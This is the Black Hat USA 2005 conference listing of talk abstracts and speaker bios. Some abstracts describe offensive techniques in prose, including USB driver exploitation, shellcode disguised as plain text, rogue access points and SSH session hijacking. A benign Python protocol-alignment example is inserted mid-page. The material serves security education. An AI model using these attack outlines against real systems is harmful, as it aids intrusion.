Black Hat Digital Self Defense USA 2005

Black Hat USA 2005 Main Conference Overview

Black Hat USA 2005 Topic descriptions are listed alphabetically by speaker.

Feedback forms will be available at the show. Let us know who was hot, who was not and get a chance to win admission to a future Briefings of your choice.

Black Hat Speakers


Investing in Our Nation's Security
Gilman Louie, President and Chief Executive Officer, In-Q-Tel

The challenge of creating an innovative, new business model aimed at enhancing national security convinced Gilman Louie to join In-Q-Tel as its first president and chief executive officer. In this role, Gilman has focused on refining and evolving In-Q-Tel's innovative model, identifying and exploring exciting new developments in technology, and, perhaps most importantly, recruiting and developing a leading team of technologists, entrepreneurs, venture capitalists and strategic visionaries that share a passion for In-Q-Tel's mission.


Rapid Threat Modeling
Akshay Aggarwal, Computer Security Consultant, IOActive Inc.

One of the most important weapons in our arsenal for securing applications is threat modeling. Applications are becoming increasingly complex and new technologies are emerging constantly. In this scenario, building or attacking applications is challenging. Threat models can help attackers discover design vulnerabilities and mount complex attacks. These models give secure application developers a great amount of leverage to envision their design, their implementation and the soundness of their architectures. Being living documents, they also carry forward any knowledge gained from previous development life cycles and are invaluable in understanding the impact of any change on the overall security posture of the applications. Understanding and constructing meaningful threat models is hard. Application teams and attackers need to be aware of what they want to model, how they want to model it and when they want to model it. Rapid Threat Modeling will help them develop models rapidly while reusing data they gathered either through reconnaissance or through the software development lifecycle. A practical hands-on demonstration of modeling threats for a complex managed application will allow for immediate use of any threat modeling knowledge gained.

Akshay Aggarwal currently works for IOActive Inc. as a computer security consultant where he is responsible for conducting security architecture design, application and source-code assessments and vulnerability research. He helps Fortune 100 clients evaluate the security of their software products and applications and develop threat models. He has authored several research papers and been invited to speak at many forums like the Multi-University Research Initiative for Protocol Development and the Center for Information Technology Research in Interest of Society. Akshay holds a MS in Computer Science from the University of California at Davis. There, at the renowned Computer Security Lab, he conducted research on Internet worms and Intrusion detection systems.


The Future of Personal Information
Joseph Ansanelli, CEO, Vontu
Richard Baich, CSO, Choicepoint
Adam Shostack
Paul Proctor, VP, Security & Risk, Gartner Research

In the last year, there have been 45 security incidents compromising the personal information of 9.3 million individuals. What can we do given our current situation? How are we going to successfully secure personal information moving forward? This panel will discuss the future of personal information and its implications on privacy.

Joseph Ansanelli is CEO of Vontu, a software company focused on the insider threat. Joseph has spoken to Congress twice in the past twelve months as an advocate of privacy and consumer data standards. Mr. Ansanelli has successfully co-founded and led two other companies and has an extensive track record of developing innovative solutions into successful companies. His first venture, Trio Development's Claris Organizer, was ultimately acquired by Palm, Inc. Mr. Ansanelli holds four patents and received a B.S. in Applied Economics from the Wharton School at the University of Pennsylvania.

Rich Baich, CISSP, CISM, Chief Information Security Officer, ChoicePoint. Mr. Baich has been working in the Information Security Business for over 10 years and has extensive experience working with government and commercial executives, providing risk management and consultative counsel while developing, improving and implementing security architecture, solutions and policies. He has held security leadership positions as the Cryptolog Officer for the National Security Agency (NSA), Sr. Director Professional Services at Network Associates (now McAfee) and, after 9/11, as the Special Assistant to the Deputy Director for the National Infrastructure Protection Center (NIPC) at the Federal Bureau of Investigation (FBI). Rich is the author of a security executive leadership guidebook, "Winning as a CISO." The book is the first of its kind to detail and provide the roadmap to transform security executives from technical and subject matter experts into comprehensive, well-rounded business executives. He holds a BS from the United States Naval Academy, an MBA / MSM from University of Maryland University College, and has been awarded the National Security Telecommunications and Information Systems Security (NSTISSI) 4011 Certification and the NSA sponsored Information Systems Security (INFOSEC) Assessment Methodology (IAM) Certification.

Adam Shostack is a privacy and security consultant and startup veteran. Adam worked at Zero-Knowledge building and running the Evil Genius group of advanced technology experts, building prototypes and doing research into future privacy technologies, including privacy enhancing networks, credentials, and electronic cash. He has published papers on the security, privacy, as well as economics, copyright and trust. Shostack sits on the Advisory Board of the Common Vulnerabilities and Exposures initiative, the Technical Advisory Board of Counterpane Internet Security, Inc and others. Adam is now an independent consultant.

Paul Proctor is a vice president in the security and risk practice of Gartner Research. His coverage includes Legal & Regulatory Compliance, Event Log Management, Security Monitoring (Host/Network IDS/IPS), Security Process Maturity Risk Management Programs, Forensics and Data Classification.

Mr. Proctor has been involved in information security since 1985. He was founder and CTO of two security technology companies and developed both first- and second-generation, host-based intrusion-detection technologies. Mr. Proctor is a recognized expert in the field of information security and associated regulatory compliance issues surrounding the Health Insurance Portability and Accountability Act (HIPAA), Sarbanes-Oxley, and the Gramm-Leach-Bliley Act (GLBA). He has authored two Prentice Hall books and many white papers and articles. Mr. Proctor is an accomplished public speaker and was recognized for his expertise by being appointed to the original Telecommunications Infrastructure Protection working group used by Congress to understand critical infrastructure protection issues prior to the terrorist attack of Sept. 11. Previously, he worked for SAIC, Centrax, CyberSafe, Network Flight Recorder and Practical Security.


A New Hybrid Approach for Infrastructure Discovery, Monitoring and Control
Ofir Arkin, CTO and Co-Founder, Insightix

An enterprise IT infrastructure is a complex and dynamic environment that is generally described as a black hole by its IT managers. Knowledge of an enterprise network's layout (topology), resources (availability and usage), and the elements residing on the network (devices, applications, their properties and the interdependencies among them), as well as the ability to keep this knowledge up to date, are all critical for managing and securing IT assets and resources.

Unfortunately, the currently available network discovery technologies (active network discovery and passive network discovery) suffer from numerous technological weaknesses which prevent them from providing complete and accurate information about an enterprise IT infrastructure. Their ability to keep track of changes is unsatisfactory at best.

The inability to "know" the network directly results in the inability to manage and secure the network in an appropriate manner: it is impossible to manage or defend something, or to defend against something, whose existence is unknown or about which only partial information exists.

The first part of the talk presents the current available network discovery technologies, active network discovery and passive network discovery, and explains their strengths and weaknesses. The talk highlights technological barriers, which cannot be overcome, with open source and commercial applications using these technologies.

The second part of the talk presents a new hybrid approach for infrastructure discovery, monitoring and control. This agent-less approach provides real-time, complete, granular and accurate information about an enterprise infrastructure. The underlying technology of the solution maintains the information in real time, and ensures the availability of accurate, complete and granular network context for other network and security applications.

During the talk new technological advancements in the fields of infrastructure discovery, monitoring and auditing will be presented.

Ofir Arkin is the CTO and Co-founder of Insightix, which pioneers the next generation of IT infrastructure discovery, monitoring and auditing systems for enterprise networks.

Ofir holds 10 years of experience in data security research and management. He has served as a CISO of a leading Israeli international telephone carrier, and worked as a Managing Security Architect at @stake, a US-based security consultancy company. In addition, Ofir has consulted and worked for multinational companies in the financial, pharmaceutical and telecommunication sectors.

Ofir conducts cutting edge research in the information security field and has published several research papers, advisories and articles in the fields of information warfare, VoIP security, and network discovery, and lectured in a number of computer security conferences about the research. The best known papers he had published are: "ICMP Usage in Scanning", "Security Risk Factors with IP Telephony based Networks", "Trace-Back", "Etherleak: Ethernet frame padding information leakage", etc. He is co-author of the remote active operating system fingerprinting tool Xprobe2.

Ofir is an active member with the Honeynet project and co-authored the team's books, "Know Your Enemy" published by Addison-Wesley.

Ofir is the founder of Sys-Security Group, a computer security research group.


Plug and Root, the USB Key to the Kingdom
Darrin Barrall, Guru, SPI Dynamics
David Dewey, Security Engineer, SPI Dynamics

USB peripheral devices are made by reputable manufacturers and will not misbehave by attacking the host system's operating system. This device is not one of those. This discussion will cover the creation of a USB meta-device, the discovery and exploitation of flaws in operating system device drivers. In a nutshell, plug this device into an otherwise locked system and it will automatically take control of the system.

Darrin Barrall has a varied background in both hardware and software. While working in the hardware world, Darrin repaired electronics in devices ranging from televisions to sports arena lighting systems. After transitioning to the software world, his talents further diversified into banking applications, and recently into buffer overflows. Darrin is currently a R&D coder for the SPI Labs group at SPI Dynamics where he specializes in breaking things.

David Dewey is a security engineer for SPI Dynamics. David came to SPI Dynamics with five years of information security experience ranging from firewall and IDS configuration and support to application level assessment and exploit research. As a pre-sales security engineer, and member of the SPI Labs team, the renowned application security research and development group within SPI Dynamics, David assists in developing new tools and researching new threats in the realm of Web application security.


Shakespearean Shellcode
Darrin Barrall, Guru, SPI Dynamics

This discussion will cover the theoretical background of using ordinary, readable text to conceal an exploit payload's true content, ending with a practical application of the discussed technique. Encoding a payload as plain text is useful in cases where input filtering eliminates many of the most useful values that make up a payload. In particular, Unicode based systems place numerous constraints on acceptable character values, making it worthwhile to create a simple decoder function that decodes far more complex shellcode data. The technique is also useful where content filtering is used: the small amount of unusual text making up the decoder can be outweighed by a large amount of grammatically correct text.

Darrin Barrall has a varied background in both hardware and software. While working in the hardware world, Darrin repaired electronics in devices ranging from televisions to sports arena lighting systems. After transitioning to the software world, his talents further diversified into banking applications, and recently into buffer overflows. Darrin is currently a R&D coder for the SPI Labs group at SPI Dynamics where he specializes in breaking things.


[ Back-up Speaker ]
Reverse Engineering Network Protocols using Bioinformatics
Marshall A. Beddoe, McAfee, Inc

Network protocol analysis is currently performed by hand using only intuition and a protocol analyzer tool such as tcpdump or Ethereal. This talk presents Protocol Informatics, a method for automating network protocol reverse engineering by utilizing algorithms found in the bioinformatics field. In order to determine fields in protocol packets, samples are aligned using multiple string alignment algorithms and their consensus sequences are analyzed to understand the beginning and the end of fields in the packet.
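The core idea in the abstract above, inferring field boundaries by aligning captured samples and reading off where they agree, can be shown in a few dozen lines. The following is an added example written for this page, not code from Protocol Informatics or from the speaker: it performs a pairwise Needleman-Wunsch global alignment of two byte strings (the talk describes multiple-sequence alignment over many samples; two samples are enough to show the mechanism), builds a column-wise consensus, and collapses it into runs of fixed bytes (candidate constants or keywords) and variable bytes (candidate fields). The two sample messages, the scoring parameters, and the function names are all constructed for the example.

```python
"""Pairwise byte alignment and consensus analysis for protocol field inference."""
from typing import List, Optional, Tuple

GAP = None  # marker for a gap inserted into an aligned sequence

# Constructed sample messages of a hypothetical line protocol (not real captures):
# a fixed 4-byte magic, a 1-byte message type, a fixed keyword, a variable name.
SAMPLE_A = b"PROT\x01login:alice"
SAMPLE_B = b"PROT\x02login:bob"


def needleman_wunsch(a: bytes, b: bytes, match: int = 1, mismatch: int = -1,
                     gap: int = -1) -> Tuple[int, List[Optional[int]], List[Optional[int]]]:
    """Global alignment of two byte strings; returns (score, aligned_a, aligned_b).

    The aligned sequences hold byte values or GAP and have equal length."""
    n, m = len(a), len(b)
    score = [[0] * (m + 1) for _ in range(n + 1)]
    for i in range(1, n + 1):
        score[i][0] = i * gap
    for j in range(1, m + 1):
        score[0][j] = j * gap
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            sub = match if a[i - 1] == b[j - 1] else mismatch
            score[i][j] = max(score[i - 1][j - 1] + sub,
                              score[i - 1][j] + gap,
                              score[i][j - 1] + gap)
    # Trace back from the bottom-right cell to recover one optimal alignment.
    i, j = n, m
    aligned_a: List[Optional[int]] = []
    aligned_b: List[Optional[int]] = []
    while i > 0 or j > 0:
        if i > 0 and j > 0:
            sub = match if a[i - 1] == b[j - 1] else mismatch
            if score[i][j] == score[i - 1][j - 1] + sub:
                aligned_a.append(a[i - 1])
                aligned_b.append(b[j - 1])
                i -= 1
                j -= 1
                continue
        if i > 0 and score[i][j] == score[i - 1][j] + gap:
            aligned_a.append(a[i - 1])
            aligned_b.append(GAP)
            i -= 1
        else:
            aligned_a.append(GAP)
            aligned_b.append(b[j - 1])
            j -= 1
    aligned_a.reverse()
    aligned_b.reverse()
    return score[n][m], aligned_a, aligned_b


def consensus(aligned: List[List[Optional[int]]]) -> List[Optional[int]]:
    """Column-wise consensus: the byte value where every sequence agrees, else None."""
    result: List[Optional[int]] = []
    for column in zip(*aligned):
        first = column[0]
        agree = first is not GAP and all(c == first for c in column)
        result.append(first if agree else None)
    return result


def infer_fields(cons: List[Optional[int]]) -> List[Tuple[str, object]]:
    """Collapse the consensus into runs: ('fixed', bytes) or ('variable', length)."""
    fields: List[Tuple[str, object]] = []
    for value in cons:
        if value is not None:
            if fields and fields[-1][0] == "fixed":
                fields[-1] = ("fixed", fields[-1][1] + bytes([value]))
            else:
                fields.append(("fixed", bytes([value])))
        else:
            if fields and fields[-1][0] == "variable":
                fields[-1] = ("variable", fields[-1][1] + 1)
            else:
                fields.append(("variable", 1))
    return fields


def analyse(a: bytes, b: bytes) -> List[Tuple[str, object]]:
    """Align two samples and report the inferred fixed/variable field layout."""
    _, aligned_a, aligned_b = needleman_wunsch(a, b)
    return infer_fields(consensus([aligned_a, aligned_b]))


if __name__ == "__main__":
    for kind, value in analyse(SAMPLE_A, SAMPLE_B):
        print(kind, value)
```

On the two constructed samples the result is four runs: the fixed magic `PROT`, a one-byte variable field (the type), the fixed keyword `login:`, and a five-column variable tail where the names of different length were aligned with gaps. The point a practitioner should take from it is that any position where samples disagree, or where one sample needed a gap, is a candidate field boundary; real captures need many more samples and a progressive multiple alignment, but the consensus step is the same.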

Marshall Beddoe is currently a Research Scientist with McAfee, Inc. Prior to McAfee, Marshall worked for Foundstone performing general computer security research and development. His main focus is on the introduction of cross disciplinary methods and techniques into the realm of computer security. He has performed extensive research on protocol analysis, passive network mapping and operating system identification. He can be reached at


Rogue Squadron: Evil Twins, 802.11intel, Radical RADIUS, and Wireless Weaponry for Windows
Beetle, the Shmoo Group
Bruce Potter, the Shmoo Group

At DefCon 11, a rogue access point setup utility named "Airsnarf" was presented by the Shmoo Group. Two years later, "Evil Twin" access points have made it to Slashdot and Who would have thought TSG could get away with the easy rogue AP attacks for so long? Note to Shmoo: Next time, put the word "evil" in the title of your presentation for mass appeal and acceptance. Oh, rock on--it WORKED!

Wireless n00b? No problemo. This talk starts off with the basics. Wireless insecurity basics. Rogue AP basics. How your wireless users are basically screwed. Etc. If you read about "Evil Twin" access points earlier this year, you will actually see how easy it is to build your own. However, this talk quickly moves on to more advanced attacks and trickery with rogue APs, including: gathering intel beyond usernames / passwords, getting around WEP and WPA-PSK protected networks, integrating RADIUS with your rogue AP, abusing vulnerable EAPs, rogue AP backend bridging, and real-time abuse of two-factor authentication a la Bruce Schneier's Springtime scary story. Even wireless warriors will learn an entertaining trick or two. You want demonstrations? Okey dokey. You'll have them.

Once everyone has the willies, the "professional" and "responsible" portion of this talk, albeit minimal, will cover rogue AP defense. Basic wireless security architectures and to-dos for home users, hotspot users, and enterprise wireless network admins are covered, as well as client-side defensive tools, WIDS considerations, and roll-your-own options.

But wait! There's more! For the closet Microsoft fanboy in all of us, wireless weapons for Windows are covered--both offense and defense. Why launch a rogue AP attack when you can launch three? Rogue AP attacks for the masses! The release of "Rogue Squadron"! It's a bizarre look at how to be a social engineering badboy with 802.11b—presented by Beetle of the Shmoo Group. If you want to know what the press will pick up on two years from now, you should probably check this out. Otherwise, move along. These are not the APs you are looking for.

Beetle is a member of the Shmoo Group, holds a BS in Computer Science, and is a D.C.-area computer security engineer. He is a geek, and he is a licensed amateur racecar driver—the perfect combination for successfully working and driving around the nation's capital. He presented on the topic of rogue access points at DefCon 11 and Black Hat Federal, demonstrating his rogue AP setup utility Airsnarf. Last year, he and the Shmoo Group pimped some of their new wireless gadgets, such as 802.11bounce and the Sniper Yagi, at DefCon 12, and Beetle unleashed Wireless Weapons of Mass Destruction for Windows at ToorCon last fall. This year, Beetle swears he is taking a break of sorts, having recently organized an East coast hacker conference in D.C. called ShmooCon this past Winter, while reminding people that rogue APs and "Evil Twins" are NOT new, and presenting on wireless topics at several other conferences this past Spring.

Bruce Potter is the founder of the Shmoo Group of security professionals, a group dedicated to working with the community on security, privacy, and crypto issues. His areas of expertise include wireless security, large-scale network architectures, smartcards and promotion of secure software engineering practices. Mr. Potter coauthored the books "802.11 Security", published in 2003 by O'Reilly, "Mac OS X Security" by New Riders in 2003 and "Mastering FreeBSD and OpenBSD Security" by O'Reilly published in April 2005. Mr. Potter was trained in computer science at the University of Alaska, Fairbanks. Bruce Potter is a Senior Associate with Booz Allen Hamilton.


A Dirty BlackMail DoS Story
Renaud Bidou, Radware

This is a real story of modern extortion in a cyberworld. Bots have replaced dynamite, and you don't buy "protection" to prevent your shop from going up in flames; you buy "consulting" to prevent your IT from being DoSed. From the first limited synflood to the conclusion, we will review those crazy 48 hours that ended up in a one-to-one digital fight. We will see in depth which attacks and mitigation techniques were involved and how they both evolved quickly in complexity and intensity. As a conclusion we will see which were the major weaknesses, found in the network architecture, the security perimeter and the target application, and how it would have been possible to prevent such an attack, limit its impact... and save money.

Renaud Bidou has been working in the field of IT security for about 10 years. He first performed consulting missions for telcos, pen-tests and post-mortem audits, and designed several security architectures. In 2000 he built the first operational Security Operation Center in France, which quickly became the 4th French CERT and a member of FIRST. He then joined Radware as the security expert for Europe, handling high-criticality security cases.

In the mean time Renaud is an active member of the rstack team and the French Honeynet Project with studies on honeynet containment, honeypot farms and network traffic analysis. He regularly publishes research articles in the French security magazine MISC and teaches in several universities in France.


Trust Transience: Post Intrusion SSH Hijacking
Adam Boileau

Trust Transience: Post Intrusion SSH Hijacking explores the issues of transient trust relationships between hosts, and how to exploit them. Applying techniques from anti-forensics, linux VXers, and some good-ole-fashioned blackhat creativity, a concrete example is presented in the form of a post-intrusion transparent SSH connection hijacker. The presentation covers the theory, a real world demonstration, the implementation of the SSH Hijacker with special reference to defeating forensic analysis, and everything you'll need to go home and hijack yourself some action.

Adam Boileau is a deathmetal listening linux hippy from New Zealand. When not furiously playing air-guitar, he works for linux integrator and managed security vendor Asterisk in Auckland, New Zealand. Previous work has placed him in ISP security, network engineering, linux systems programming, corporate whore security consultancy and a brief stint at the helm of a mighty installation of solaris tar. Amongst his preoccupations at the moment are the New Zealand Supercomputer Centre, wardriving-gps-visualization software that works in the southern hemisphere, and spreading debian and python bigotry. Oh, and Adam's band 'Orafist' needs a drummer - must have own kit and transport to New Zealand.


Executive Women’s Forum Panel and Reception - Sometimes, It Is All Who You Know!
Moderator: Joyce Brocaglia, CEO, Alta Associates and Founder of the EWF
Pamela Fusco, CSO, Merck
Kelly Hansen, CEO, Neohapsis
Rhonda E. MacLean, Senior VP,CISO, Bank of America

How strong is your professional network? Do you know who to call upon for support within your company? How about discreet support from outside your company? Building a strong network of support within your company or business is critical for success. The Executive Women's Forum (EWF) is a group of over 200 of the most senior executive women in information security, risk management and privacy who meet yearly to share experiences and build trust based relationships. The EWF will host a networking event for all women attending Black Hat USA 2005. Come and get to know your peers and past EWF participants. This two-hour workshop will begin with a panel discussion talking about different roads to the top and the importance of networking. The interactive panel will be followed by intense networking and a reception. Learn more about the EWF at

Joyce Brocaglia is president and chief executive officer of Alta Associates, the premier executive recruitment firm for the information security industry. In 2003, Brocaglia founded the Executive Women’s Forum. In September of 2003, Information Security Magazine honored her with a “Women of Vision” award naming her one of the 25 most influential women in the information security industry. She is the career advisor of CSO Magazine and author of the monthly “Career Corner” column for the Information Systems Security Association (ISSA) Journal Magazine. Ms. Brocaglia also serves on the board of advisors for the Information Systems Security Association and ISC2.

Pamela Fusco, CISSP, CISM, CHS-III, Chief Security Officer, Merck & Co., Inc.
Pamela Fusco is an Executive Global Information Security Professional, for Merck & CO., Inc. She has accumulated over 19 years of substantial experience within the Security Industry. Her extensive background and expertise expand globally encompassing all facets of security inclusive of logical, physical, personal, facilities, systems, networks, wireless, and forensic investigations. Presently she leads a talented team of Compliance, Systems and Information Security Engineers operating a world-wide 24X7X365 SIRT (security incident response team).

Kelly Hansen is CEO of Neohapsis, a leading-edge provider of information security consulting, computer forensics, and enterprise IT product-testing services. Kelly also writes a regular column for Secure Enterprise Magazine and contributes to Network Computing Magazine. Kelly is an Executive Board member of the Wisconsin Technology Council, a non-profit corporation established to implement programs crucial to the future success of Wisconsin based high-tech companies. Kelly is also on the Advisory Team for the Executive Women's Forum, a community of more than 150 executive women in security. Kelly is an established and well-known public speaker. She has keynoted an FBI InfraGard conference and given extensive training seminars for organizations as diverse as the Association of American Insurers, the National Association of Restaurants, and the American Law Firm Association. In addition, she has conducted Continuing Legal Education (CLE) accredited seminars for the State Bar Associations in Wisconsin, Illinois and Minnesota. Prior to joining Neohapsis, Kelly was president and CEO of Sun Tzu Security, a security consulting firm she founded in 1996. Kelly graduated from the University of Rochester and holds a Masters from Harvard University.

Rhonda E. MacLean is Senior Vice President and Chief Information Security Officer for Bank of America. She is responsible for the company’s information security policies and awareness, information risk management; security technology implementations, and cyber investigations. MacLean has spent more than 20 years in the information technology industry. Immediately before joining Bank of America in 1996, MacLean was responsible for information security at The Boeing Company. MacLean served as the chairperson of the Financial Services Sector Coordinating Council for Critical Infrastructure Protection and Homeland Security from 2002-2004 and also as advisor to the Congressional Subcommittee on Technology in her capacity as a member of the Corporate Information Security Working Group. She sits on the Global Council of CSOs, a think tank of senior cyber leaders. She continues to work with BITS, the technology group for The Financial Services Roundtable as a member of the Executive Committee.


Toolkits: All-in-One Approach to Security
Kevin Cardwell

This talk will be on using toolkits for your pen-testing, vulnerability assessment, etc. Configuring a plethora of the different tools out there can be quite time consuming and challenging. The focus of this talk will be to look at an alternative solution that provides a suite of tools at boot. Until recently there were not very many toolkits, and the ones that were there did not work very well; that has changed, and in this talk I will discuss the toolkits available and demo one of the better ones. The toolkits that will be reviewed will all be open source and free. There are commercial solutions available, but why pay when the free ones are more than adequate?

Kevin Cardwell spent 22 years in the U.S. Navy, starting off in Sound Navigation and Ranging (SONAR). He began programming in 1987. He was fortunate enough to get on the Testing Team and got to test and evaluate Surveillance and Weapon system software including the Remote Mine-Hunting System, Multi-System Torpedo Recognition Alert Processor (MSTRAP), Advanced Radar Periscope Discrimination Detection System (ARPDD), Tactical Decision Support Subsystem (TDSS) and Computer Aided Dead Reckoning Tracer (CADRT). Shortly thereafter he became a software and systems engineer and was selected to head the team that built a Network Operation Center (NOC) that provided services to the command ashore and ships at sea in the Norwegian Sea and Atlantic Ocean.

In 2000, Cardwell formed his own Engineering Solutions company and has been providing consulting services for companies throughout the UK and Europe. He is also an Adjunct Associate Professor for the University of Maryland University College and is the European rep for the Information Assurance curriculum. He holds a BS in Computer Science from National University in California and a MS in Software Engineering from the Southern Methodist University (SMU) in Texas.


Demystifying MS SQL Server & Oracle Database Server Security
Cesar Cerrudo, Argeniss

Databases are where your most valuable data rests. When you use a database server you implicitly trust the vendor, because you think you bought a good and secure product. This presentation will compare MS SQL Server and Oracle Database Server from a security standpoint; the comparison will include product quality, holes, patches, etc. This presentation will also show how both vendors manage security issues and how they have evolved over time. The main goal of this presentation is to kill the myths surrounding both products and let people know the truth about how secure these products are.

Cesar Cerrudo is a security researcher specialized in application security. Cesar is running his own company, Argeniss. Regarded as a leading application security researcher, Cesar is credited with discovering and helping fix dozens of vulnerabilities in applications including Microsoft SQL Server, Oracle database server, Microsoft BizTalk Server, Microsoft Commerce Server, Microsoft Windows, Yahoo! Messenger, etc. Cesar has authored several white papers on database and application security and has been invited to present at a variety of companies and conferences including Microsoft, Black Hat, Bellua and CanSecWest.


Checking Array Bound Violation Using Segmentation Hardware
Tzi-cker Chiueh, Professor, Stony Brook University

The ability to check memory references against their associated array/buffer bounds helps programmers to detect programming errors involving address overruns early on and thus avoid many difficult bugs down the line. Because such programming errors have been the targets of remote attacks, i.e., buffer overflow attack, prevention of array bound violation is essential for the security and robustness of application programs that provide service on the Internet.

This talk proposes a novel approach called CASH to the array bound checking problem that exploits the segmentation feature in the virtual memory hardware of the X86 architecture.

The CASH approach allocates a separate segment to each static array or dynamically allocated buffer, and generates the instructions for array references in such a way that the segment limit check in X86's virtual memory protection mechanism performs the necessary array bound checking for free. In those cases that hardware bound checking is not possible, it falls back to software bound checking. As a result, CASH does not need to pay per-reference software checking overhead in most cases. However, the CASH approach incurs a fixed set-up overhead for each use of an array, which may involve multiple array references. The existence of this overhead requires compiler writers to judiciously apply the proposed technique to minimize the performance cost of array bound checking.

This talk will describe the detailed design and implementation of the CASH compiler, and a comprehensive evaluation of various performance tradeoffs associated with the proposed array bound checking technique. For the set of production-grade network applications we tested, including Apache, Sendmail, Bind, etc., the latency penalty of CASH's bound checking mechanism is between 2.5% and 9.8% when compared with the baseline case that does not perform any bound checking.

Dr. Tzi-cker Chiueh is a Professor in the Computer Science Department of Stony Brook University, and the Chief Scientist of Rether Networks Inc. He received his B.S. in EE from National Taiwan University, M.S. in CS from Stanford University, and Ph.D. in CS from University of California at Berkeley in 1984, 1988, and 1992, respectively. He received an NSF CAREER award in 1995, and has published over 130 technical papers in refereed conferences and journals in the areas of operating systems, networking, and computer security. He has developed several innovative security systems/products in the past several years, including SEES (Secure Mobile Code Execution Service), PAID (Program Semantics-Aware Intrusion Detection), DOFS (Display-Only File Server), and CASH.


The Defense Cyber Crime Center
Jim Christy, Supervisory Special Agent and Director, Defense Cyber Crime Institute, Department of Defense

This talk will cover the Defense Cyber Crime Center (DC3), our mission and capabilities. The DC3 is one-stop shopping for cyber crime related support. We have approximately 160 people assigned in 3 main organizations:

  • The Defense Computer Forensics Lab - probably the largest digital forensics lab in the world and the leader in handling large datasets. One case averages 75 terabytes.
  • The Defense Computer Investigations Training Program - the most high-tech classrooms in the world, training all of the DoD criminal and counterintelligence agents on the techniques to investigate cyber crime. FBI, Secret Service and Department of State, Diplomatic Security Service actually buy our courses for their agents due to the quality.
  • The Defense Cyber Crime Institute - my organization, responsible for research and development of new digital forensics tools as well as the validation, test and evaluation of these tools.

Since crime labs now are moving to accreditation so that their evidence will be admissible in court, all of the tools used in a crime lab must first be independently tested and validated. You can't download the latest and greatest tool from the Internet or purchase it and use it without validating it first.

Digital forensics is now a recognized forensic discipline just like ballistics, serology, DNA, handwriting analysis, and fingerprint analysis. As such, there are best practices that must be adhered to. The discipline is on the cusp, moving from ad hoc to certified professionals. The institute would like to be the Consumer Reports for digital forensics tools someday. Check out our website,


Legal Aspects of Computer Network Defense-A Government Perspective & A Year in Review Important Precedents in Computer and Internet Security Law 2004 - 2005
Robert W. Clark, Command Judge Advocate, 1st Information Operations Command (LAND) (ACERT Legal Advisor) U.S. Army

This presentation looks at computer network defense and the legal cases of the last year that affect internet and computer security. It clearly and simply explains (in non-legal terms) the legal foundations available to service providers to defend their networks, quickly tracing the legal origins from early property common-law doctrine into today's statutes and then moving into recent court cases and battles. This presentation will quickly become an open forum for questions and debate.

Major Robert Clark is the Command Judge Advocate for the Army's 1st Information Operations Command. As the sole legal advisor, his primary duty is to advise the Army's Computer Network Operations Division on all aspects of computer operations and security. This role has him consulting with the DoD Office of General Counsel, NSA, and DoJ Computer Crime and Intellectual Property Section. He lectures at the Army's Intelligence Law Conference and at the DoD's Cybercrimes Conference.


Routing in the Dark: Scalable Searches in Dark P2P Networks.
Ian Clarke
Oskar Sandberg

It has become apparent that the greatest threat toward the survival of peer to peer, and especially file sharing, networks is the openness of the peers themselves towards strangers. So called "darknets", encrypted networks where peers connect directly only to trusted friends, have been suggested as a solution to this. Some small-scale darknet implementations, such as Nullsoft's WASTE, have already been deployed, but these share the problem that peers can only communicate within a small neighborhood.

Utilizing the small world theory of Watts and Strogatz, Jon Kleinberg's algorithmic observations, and our own experience from working with the anonymous distributed data network Freenet, we explore methods of using the dynamics of social networks to find scalable ways of searching and routing in a darknet. We discuss how the results indicating that human relationships really form a "small world" allow for ways of restoring to the darknet the characteristics necessary for efficient routing. We illustrate our methods with simulation results.

This is, to our knowledge, the first time a model for building peer to peer networks that allow for both peer privacy and global communication has been suggested. The deployment of such networks would offer great opportunities for truly viable peer to peer networks, and a very difficult challenge to their enemies.

Ian Clarke is the architect and coordinator of The Freenet Project, and the Chief Executive Officer of Cematics Ltd, a company he founded to realise commercial applications for the Freenet technology. Ian is the co-founder and formerly the Chief Technology Officer of Uprizer Inc., which was successful in raising $4 million in A-round venture capital from investors including Intel Capital. In October 2003, Ian was selected as one of the top 100 innovators under the age of 35 by the Massachusetts Institute of Technology's Technology Review magazine. Ian holds a degree in Artificial Intelligence and Computer Science from Edinburgh University, Scotland. He has also worked as a consultant for a number of companies including 3Com, and Logica UK's Space Division. He is originally from County Meath, Ireland, and currently resides in Edinburgh, Scotland.

Oskar Sandberg is a post graduate student at the Chalmers Technical University in Gothenburg, Sweden. He is working on a PhD about the mathematics of complex networks, especially with regard to the small world phenomenon. Besides this he has an active interest in distributed computer networks and network security, and has been an active contributor to The Freenet Project since 1999.


Shatter-proofing Windows
Tyler Close

The Shatter attack uses the Windows API to subvert processes running with greater privilege than the attack code. The author of the Shatter code has made strong claims about the difficulty of fixing the underlying problem, while Microsoft has, with one exception, claimed that the attack isn't a problem at all. Whether or not Shatter is indeed an exploit worth worrying about, it uses a feature of Windows that has other malicious uses, such as keystroke logging. This talk presents a means of defeating this entire family of attacks with minimal breaking of applications and effect on the look and feel of the user interface.

Tyler Close is a researcher and developer, working in the field of secure, multi-user, distributed applications since 1998. He is the designer of the web-calculus, a messaging model for creating POLA interfaces between heterogeneous applications. He is a developer for an ongoing series of applications in the POLA genre, including: Waterken Server, for web-services; petname tool, anti-phishing browser extension; httpsy, decentralized authentication for the WWW; E language, P2P scripting language; Waterken DB, capability-based object database; Waterken IOU, generic rights transfer protocol. Tyler joined HP as a Visiting Scientist in 2005 to work on the Virus Safe Computing Initiative.


Beyond Ethereal: Crafting A Tivo for Security Datastreams
Greg Conti, Assistant Professor of Computer Science, United States Military Academy, West Point, New York

Ethereal is a thing of beauty, but ultimately you are constrained to a tiny window of 30-40 packets that is insufficient when dealing with network datasets that could be on the order of millions of packets. In addition, it only displays traffic from packet captures and lacks the ability to incorporate and correlate other security related datastreams. In an attempt to break from this paradigm, we will explore conceptual, system design and implementation techniques to help you build better security analysis tools. By applying advanced information visualization and interaction techniques such as dynamic queries, interactive encoding, semantic zooming, n-gram analysis and rainfall visualization you will gain far more insight into your data, far more quickly than with today's best tools. We will discuss lessons learned from the implementation of a security PVR (a prototype will be released) and explore additional topics such as using visual techniques to navigate and semantically encode small and large binary objects, such as executable files, to improve reverse engineering. To get the most out of this talk you should have a solid understanding of the OSI model and network protocols.

Greg Conti is an Assistant Professor of Computer Science at the United States Military Academy. He holds a Masters Degree in Computer Science from Johns Hopkins University and a Bachelor of Science in Computer Science from the United States Military Academy. His areas of expertise include network security, information visualization and information warfare. Greg has worked at a variety of military intelligence assignments specializing in Signals Intelligence. Currently he is on a Department of Defense Fellowship and is working on his PhD in Computer Science at Georgia Tech. His work can be found at and


